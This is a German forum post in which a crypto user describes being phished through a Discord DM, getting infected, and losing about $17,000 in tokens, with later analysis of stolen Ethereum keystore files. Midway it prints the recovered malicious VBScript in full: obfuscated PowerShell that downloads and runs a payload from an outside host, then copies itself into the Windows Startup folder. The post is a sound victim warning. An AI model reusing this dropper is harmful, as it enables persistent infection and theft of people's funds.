So mal ein kleiner Erfahrungsbericht als warnendes Beispiel, wobei viele sicher vorsichtiger sind als ich.
In einem Moment der Unachtsamkeit am 27.04, habe ich eine DM in Discord mit einer Nachricht aus dem Avalanche Announcements verwechselt. Irgendwie habe ich da einen 5 Min Aussetzer gehabt oder war nicht bei der Sache/abgelenkt.
Die Seite sah "vertrauenswürdig" aus, das Zertifikat hat auch gepasst, und so wollte ich mir die App ansehen. Datei runtergeladen, beim Installationsversuch eine Warnung erhalten und diese ignoriert.
Schnell wurde mir klar, dass ich scheisse gebaut habe. Im Avalanche Discord kamen auch schon die ersten Meldungen und Warnungen, dass auch andere Nutzer diese Nachricht bekommen haben und dies ein Scam ist.
Ich habe dann gleich wieder alles deinstalliert und auch den Virenscanner nochmal explizit drüber laufen lassen und auch eine .vbs aus dem Autostart gefischt.
Dachte, damit hat es sicher erledigt.
Dem war leider nicht so. Am 15.05 wollte ich mal wieder nach meinen PCL schauen, und musste feststellen, dass alle PCL und ein paar ETH Krümel von meinem Konto abgezogen wurden.
Als ich auf die ETH Adresse geschaut habe, sah ich dann noch andere Token von mir dort, nämlich ein paar Auctus
https://etherscan.io/address/0x827b0668dfe17e42727bac902526cf6676c24a79Nach weiter Prüfung fand ich noch ein drittes Account das leer war, dort wurden aber nur die verblieben ETH abgezogen, da die Token nichts wert waren.
Am 10.05 hatte der Angreifer die ETH dann
abgezogen [/url=https://etherscan.io/address/0xc9ddd5bd26f9a1260e6f24d0644c140c390c8a08]. Das [url=http://Konto]Konto, auf welches meine funds abgezogen wurden gibt es übrigens schon seit 2018
und es gibt da leider über 500 Transaktionen...
Da ich nicht wusste wie und wo der Angreifer Zugriff bekommen konnte habe ich dann angefangen zu suchen. Schnell wurde klar, dass es zeitlich genau mit der DM und meiner bullshit Aktion passte.
Ich habe dann nochmals genauer meinen PC geprüft und musste feststellen, dass am 14.05 eine Tevvvvvst.vbs von der Antivirensoftware aus meinem Autostart gezogen wurde. Leider wurde sie dort immer wieder hin kopiert. Der Angreifer hatte also immer noch Zugang... (ich habe später übrigens noch eine .vbs mit dem selben Inhalt gefunden, was wohl die Kopiervorlage aber mit anderem namen war...)
Set vvvvvvvvvvvvvvnnnnnnnnnnnnnn = CreateObject("WScript.Shell")
ddddddddddddddddddddd="cmd.exe /c"
qqqaaaaaaaaaazzzzzzzzzz = StrReverse(" l"+"le"+"hs"+"re"+"wo"+"P")
vvvvvvvvvvvvvvnnnnnnnnnnnnnn.Run(ddddddddddddddddddddd+qqqaaaaaaaaaazzzzzzzzzz+" Inv"+"oke-Exp"+"res"+"sion((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'Webc'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('h t t p s ://zapper.ws/test.jpg'))));exit "), CONSOLE_HIDE, CMD_WAIT
Set vvvvvvvvvvvvvvnnnnnnnnnnnnnn = Nothing
WScript.Sleep (60000)
on error resume next
Const ssfSTARTUP = &H7
Set fso=CreateObject("Scripting.FileSystemObject")
Set oShell = CreateObject("Shell.Application")
Set startupFolder = oShell.NameSpace(ssfSTARTUP)
currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)
If Not startupFolder Is Nothing Then
st1="."
st2="v"+"b"
st3="s"
fso.CopyFile currentPath, startupFolder.Self.Path & "\Tevvvvvst" + st1 + st2 + st3
End If
WScript.Quit()Ein geo nslookup auf h t t p s ://zapper.ws/test.jpg führt zu Servern auf den Sychellen.
IP General InformationIP Address:185.212.130.65Hostname:185.212.130.65ISP:Internet It Company IncIP Geolocation InformationContinent:Africa (AF)Country:Seychelles (SC) SC
Die Dateien auf zapper.ws gehören vermutlich zu irgendwelchen exploit kits....
Die Frage war nur wie er die Konten leer räumen konnte... Hatte er Zugriff auf mein Metamask, oder gar Zugriff auf mein Keepass. Liefen vielleich key- oder screen logger mit...Da kommt dann schon leicht "Panik" auf. Ich habe lange gesucht und folgendes Muster gefunden....
Die drei Konten die leer geräumt waren, hatte ich alle vor langer Zeit mal im Ethereum Wallet "Mist". Ich hatte darin noch mehrere Konten, aber auf einigen waren einfach nur Token ohne ETH, so dass keine Sende-Gebühren bezahlt werden konnten. Und die verschlüsselten .json Dateien lagen ebenfalls auf meinem PC. Die Passwörter für die Dateien sind aber 14-15 Zeichen mit Zahlen, Groß-Kleinschreibung und Sonderzeichen das schafft man weder mit bruteforce noch mit rainbow table in der kurzen Zeit. Also musste der Angreifer anderweitig Zugriff bekommen haben...
Ich habe dann zunächst mal meinen Windows 10 PC neu aufgesetzt neues Keepass Dateien und Metamask Dateien erstellt und meinem Portfolio nach neue Konten erstellt, die Funds überwiesen und wieder restaked, z.B. XTZ und Waves. Auch alle verblieben (nennenswerten) ehml. Mist ETH Token habe ich auf neue Konten verschoben. Bei der Diskussion mit unserem ChefImGartenPavillion (nochmal danke für die Zeit und Unterstützung!) bin ich dann auf folgendes Paper gestoßen:
https://www.researchgate.net/publication/337610456_Attainable_Hacks_on_Keystore_Files_in_Ethereum_Wallets-A_Systematic_AnalysisDort gibt es folgende Passage:
There is no encryption applied to the keystore file and it is stored in a plaintext file with content in JSON format. Any malicious user who has access to the Ethereum wallet file directory, can steal this file and use hashcat to crack its password.
Nachdem ich das geprüft habe, war es tatsächlich so, dass ich noch diese alten keystore files auf meiner hdd hatte. Und soweit ich das paper richtig verstanden habe, kann man wohl mit Zugriff auf die keystores mit hashcat auch die Konten auslesen...
Es sind natürlich alles Annahmen und ich hoffe, das ich richtig liege und nicht noch mehr kommt. Gerade meine AVAX sind noch ein paar Tage im Staking bevor ich sie auf ein neues Konto transferieren kann.
Aber die Moral von der Geschichte ist: -> nicht blöd sein
-> Hardware Wallet und falls nicht ->
Keepass, keystores und .json Datein möglichst nicht auf dem PC halten, dann lieber extern mit entsprechenden Sicherungen.Abgesehen von der tagelangen Arbeit und den schlaflosen Nächten, hat mich das ca. ~$17.000 USD Lehrgeld gekostet. Ich muss mal sehen, ob ich noch zur Polizei gehe. Meinen PC habe ich ja neu aufgesetzt und damit die "Spuren" verwischt, ein Image etc. war mir zu aufwendig, ich hatte andere Prioritäten. Bei der Adresse die es seit 2018 gibt, sind auch einige withdraws von Binance, Huobi und anderen Börsen, vielleicht schreibe ich die noch an, aber ob da was raus kommt. Bei etherscan.io wollte ich die Adresse melden, aber die wollen irgendwelche Screenshots von Phisihing Seiten, das war bei mir ja nicht nötig
Falls nochmal was (weg) kommt melde ich mich wieder
Da wurde es mir richtig warm als ich den Fehler bemerkt habe.